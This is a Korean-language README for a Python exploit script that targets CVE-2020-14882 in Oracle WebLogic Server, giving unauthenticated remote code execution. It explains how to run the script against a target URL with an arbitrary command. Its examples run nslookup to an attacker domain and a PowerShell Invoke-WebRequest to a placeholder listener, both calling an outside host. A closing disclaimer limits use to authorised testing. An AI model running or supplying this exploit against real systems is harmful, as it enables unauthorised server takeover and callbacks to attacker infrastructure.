
이 스크립트는 Oracle WebLogic Server에서 원격 코드 실행(RCE)을 가능하게 합니다.
이 스크립트는 인증되지 않은 GET 요청을 사용하여 Oracle WebLogic Server에서 원격 코드 실행(RCE)을 가능하게 합니다. CVE-2020-14882 취약점을 악용합니다. 임의의 명령어를 실행하여 공격자가 서버에 무단으로 액세스할 수 있습니다.
Python 3이 설치되어 있는지 확인하세요. 이 스크립트를 사용하려면 아래 단계를 따르십시오:
터미널 또는 명령 프롬프트를 엽니다.
다음 명령어를 사용하여 스크립트를 실행합니다:
python3 exploit.py http(s)://target:7001 command
http(s)://target:7001을 Oracle WebLogic Server의 대상 URL로, command를 실행할 명령어로 바꿉니다.
예제 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
이 예제는 대상 서버에서 nslookup your_Domain 명령어를 실행합니다.
예제 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
이 예제는 대상 서버에서 PowerShell 명령어 Invoke-WebRequest -Uri http://your_listener를 실행합니다.
이 스크립트는 허가된 침투 테스트 및 보안 연구 목적으로만 사용해야 합니다. 적절한 동의 없이 시스템을 악용하기 위해 이 스크립트를 무단으로 사용하는 것은 불법이며 법적 조치를 초래할 수 있습니다. 사용에 따른 책임은 본인에게 있습니다.
이 스크립트에는 다음 종속성이 필요합니다:
requestsurllib3스크립트 실행 전에 이 종속성들이 설치되어 있는지 확인하십시오.